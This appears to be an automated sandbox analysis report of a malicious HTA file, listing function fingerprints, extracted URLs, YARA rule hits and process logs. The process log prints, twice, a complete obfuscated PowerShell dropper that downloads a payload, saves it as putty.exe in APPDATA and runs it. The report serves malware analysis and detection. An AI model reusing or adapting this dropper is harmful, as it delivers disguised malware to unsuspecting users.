Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5523978372f9f6b75eb525958e6b9632026aa1ca31228c7d0f06141b52d68a7
Instruction ID: bc68bf09a5d2235586741f9a8becb7568acc3e5d95184e9cedc6a565f368e4a2
Opcode Fuzzy Hash: e5523978372f9f6b75eb525958e6b9632026aa1ca31228c7d0f06141b52d68a7
Instruction Fuzzy Hash: 5111F775E402089FCB04DFA8E994ADDBBB1FF88314F104559D505BB361DB31AC418F60

Uniqueness

Uniqueness Score: -1.00%

Function 04F4BE10 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccd320e1aafd654bde5c0d13ff0a3855cd3ad3f5affcd9bbecec1fa7c673f97
Instruction ID: 6fa0493cdf4e9a282fbe4e4b0678edec1fb88f0fba14520c48ef9d606c02e21d
Opcode Fuzzy Hash: 7ccd320e1aafd654bde5c0d13ff0a3855cd3ad3f5affcd9bbecec1fa7c673f97
Instruction Fuzzy Hash: 0F01F971A452449FCB05DFE8E8949AD7FB1DF89324F1441A9E909EB3E2C634DC01C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07DC14D3 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64064e099a8d3e1d0c6ea4155c695266ecda3f645c2d6098f6ffaea758316a14
Instruction ID: f752404718e3a51adc5e223248a47bd85025df0799978a42467013dc7bd1a56c
Opcode Fuzzy Hash: 64064e099a8d3e1d0c6ea4155c695266ecda3f645c2d6098f6ffaea758316a14
Instruction Fuzzy Hash: 38E0D8727801053FC61466EC2940BAEBB8BABD8351B105075F700EB251DD264D5503B2

Uniqueness

Uniqueness Score: -1.00%

Function 04F4BD4F Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36da6002d79d6ceb7ca38a66b972a4770e9dc04638e750744bd898cd31a4326
Instruction ID: f3b4183fb83a22f850d5e3e91b4d38be7794bd2516069ea959f2ecae97a734b8
Opcode Fuzzy Hash: e36da6002d79d6ceb7ca38a66b972a4770e9dc04638e750744bd898cd31a4326
Instruction Fuzzy Hash: 65E092B4E0420A9F8F48DFB995421BEBFF5AB48200F00856E9819E3300EA345A418FE5

Uniqueness

Uniqueness Score: -1.00%

Function 04F4BD50 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dceea6ed0bb32bbf1231d54a840220893aa41ad542f3503ed2e5fe4b958b697
Instruction ID: a9ee127155b30a40b114bef7803819fa0a23d9b7c8e3bb5006bb373e8a3cf630
Opcode Fuzzy Hash: 2dceea6ed0bb32bbf1231d54a840220893aa41ad542f3503ed2e5fe4b958b697
Instruction Fuzzy Hash: 45E0B6B4E0420E9F8F48DFB995421BEFFF5AB48200F00856E9819E3300EA345A018FD5

Uniqueness

Uniqueness Score: -1.00%

Function 04F4BE20 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbba0cd2c02eb8b14dda7d45085109ebd2a7d118a4cb60e842a46466304b781a
Instruction ID: ecdc0b4e2b2528a02cd700c53d3169f66630458ec8c99edd867c24ff841f5dc3
Opcode Fuzzy Hash: dbba0cd2c02eb8b14dda7d45085109ebd2a7d118a4cb60e842a46466304b781a
Instruction Fuzzy Hash: 27D0A7392402109FC308EFA8F54CD453BFAEF4C6247014098EA09C73B2CB25DD008BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F4BD1C Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b751d6787d600bd87025397cf659e0dd70be064748dd587aeb5ec6e389086a
Instruction ID: 5f98fb33fa65a054e04997cd4e65d8e48d71a88ecb8481c0fe0ea32fce4a7e27
Opcode Fuzzy Hash: 74b751d6787d600bd87025397cf659e0dd70be064748dd587aeb5ec6e389086a
Instruction Fuzzy Hash: 24C08C7600A60C86D32453A4B00E3E4FF69AB40216F442AC9F18900C03AE24B0D293F2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07DC22A8 Relevance: 9.2, Strings: 7, Instructions: 495COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC22EC
tP^q, xrefs: 07DC2331
$^q, xrefs: 07DC22E0
tP^q, xrefs: 07DC2325
$^q, xrefs: 07DC22BA
4'^q, xrefs: 07DC2519
4'^q, xrefs: 07DC250F

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 98d4398e350693ef945f5c9e285b0eaeb81bd54da26012a47a7d9ab837454edb
Instruction ID: e1beb617fe4836feb05e401c5922ea7f331e0812de09495e533a8401313ca1fc
Opcode Fuzzy Hash: 98d4398e350693ef945f5c9e285b0eaeb81bd54da26012a47a7d9ab837454edb
Instruction Fuzzy Hash: A4F144B27002079FCB15CA68D8006AAFBE2BF86320F24807ED555CF355DB36E995C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07DC15F8 Relevance: 9.1, Strings: 7, Instructions: 321COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC180C
4'^q, xrefs: 07DC16FB
$^q, xrefs: 07DC1800
$^q, xrefs: 07DC17DA
tP^q, xrefs: 07DC1845
4'^q, xrefs: 07DC1707
tP^q, xrefs: 07DC1851

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 3e7fbdcc1590446692c63a59b6d6312035592735d67a282c65030fca7351edc3
Instruction ID: d339c28d8bd0b4f94621ada78c3a303826562a871c0b80adccdc8df498ed1410
Opcode Fuzzy Hash: 3e7fbdcc1590446692c63a59b6d6312035592735d67a282c65030fca7351edc3
Instruction Fuzzy Hash: 1EA15BF170422BDFC715CA69940066AFBE6AFC2210B2884AFD485DF396DA37CC55C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07DC4E78 Relevance: 7.7, Strings: 6, Instructions: 202COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC4EEB
$^q, xrefs: 07DC4F13
$^q, xrefs: 07DC4ECF
$^q, xrefs: 07DC4F25
$^q, xrefs: 07DC4F31
$^q, xrefs: 07DC4F07

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 70508811efe44af869e80a8314a97e162c91c154ef57ba8a746609ab2e8e58c1
Instruction ID: c9546d0d76290ae76bc9a056f76da58bab44e64dd130c13a0828e2c8ac91d892
Opcode Fuzzy Hash: 70508811efe44af869e80a8314a97e162c91c154ef57ba8a746609ab2e8e58c1
Instruction Fuzzy Hash: 15518BB27043979FD724DA69D810666FFE9AFC6210B24847FD585CF242DE32C859C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 07DC3438 Relevance: 6.6, Strings: 5, Instructions: 373COMMON

Download Yara Rule

Strings

0U^q, xrefs: 07DC3453
4'^q, xrefs: 07DC361D
4'^q, xrefs: 07DC37CD
4'^q, xrefs: 07DC37C1
4'^q, xrefs: 07DC3611

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 0U^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2018072352
Opcode ID: 6cac25889078a769c5e6d47346013e82f19145a33c7705e203ea52ce6ef30486
Instruction ID: be6e3d2263b33d043bfce18cc336737219c18ab61eb878d47496463e1f93ba86
Opcode Fuzzy Hash: 6cac25889078a769c5e6d47346013e82f19145a33c7705e203ea52ce6ef30486
Instruction Fuzzy Hash: 34C115F1B442079FCB15DB68D84466AFBE6AFC6214B24C06EC545CF355DA32C886CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 07DC2E80 Relevance: 5.5, Strings: 4, Instructions: 470COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07DC30D8
4'^q, xrefs: 07DC2F88
4'^q, xrefs: 07DC2F7E
4'^q, xrefs: 07DC30E2

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: d5a443729488358d496af513f2a14f96fcc3f1855f6568a51b10c5aec599151f
Instruction ID: 3672e84e57ebb97d1ae335144902c4abc1d573d2b3a434964c08cfcbb74aec87
Opcode Fuzzy Hash: d5a443729488358d496af513f2a14f96fcc3f1855f6568a51b10c5aec599151f
Instruction Fuzzy Hash: F1E134F1B042079FCB14CB69980076AFBA6AF86310F24C0AED445DF256DE32D895C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 07DC4218 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC4274
$^q, xrefs: 07DC4280
$^q, xrefs: 07DC422A
$^q, xrefs: 07DC4246

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 4b936c6e06c89504eb51274f24eafc0994f3e7168e8586b52af89962ceaf344d
Instruction ID: 9c549109cc586f67eb24531b12e609762b7e3f7e9a68ae9dd8fb75b17234fe75
Opcode Fuzzy Hash: 4b936c6e06c89504eb51274f24eafc0994f3e7168e8586b52af89962ceaf344d
Instruction Fuzzy Hash: E02188B1310347ABDB3489AA9822B27EFDA9BC1714F20803EE945CF385CD36C840C360

Uniqueness

Uniqueness Score: -1.00%

Function 07DC4E5B Relevance: 5.1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC4EEB
$^q, xrefs: 07DC4ECF
$^q, xrefs: 07DC4F25
$^q, xrefs: 07DC4F07

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 6b6bbfa8eb0f68ca7a70a0b56037094204524f5f478cf84f94760588184e680d
Instruction ID: cd0ec876e8bb875faef41807545827af7a0f3c1d7ba7c4c3a119dba94ab81108
Opcode Fuzzy Hash: 6b6bbfa8eb0f68ca7a70a0b56037094204524f5f478cf84f94760588184e680d
Instruction Fuzzy Hash: EA2108F290438B9FDB21CF148560765FFF8AF46610F1940AFC4848B142DB31C559C762

Uniqueness

Uniqueness Score: -1.00%

Function 07DC0F8B Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07DC0FFF
4'^q, xrefs: 07DC0FF3
$^q, xrefs: 07DC0FD2
$^q, xrefs: 07DC0FDE

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: eb09b35343e3bf5eeb4c9d04c72572e27e841b842a400d38037817d1debbf295
Instruction ID: bc8d2b838b4304d1d1c80d61f72eee4003bd8afc887007d09c9981171da98bf7
Opcode Fuzzy Hash: eb09b35343e3bf5eeb4c9d04c72572e27e841b842a400d38037817d1debbf295
Instruction Fuzzy Hash: 7D01F2617093DB8FC32B5768186055AAFB65FC361072A04DFC180DF2ABCD258C8AC3B2

Uniqueness

Uniqueness Score: -1.00%

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443

Source: powershell.exe, 00000001.00000002.1674324075.0000000007A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1670355706.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1670355706.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1670355706.00000000057C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li
Source: powershell.exe, 00000001.00000002.1670355706.0000000005364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1670355706.000000000534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1670355706.0000000005368000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.79/w64/putty.exe
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe

Source: amsi32_6928.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6928, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: amsi32_6928.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6928, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\epah.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo;	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07DC2CC3 push FFFFFF8Bh; iretd		1_2_07DC2CC5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07DC0BDC push ss; ret		1_2_07DC0BE0

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
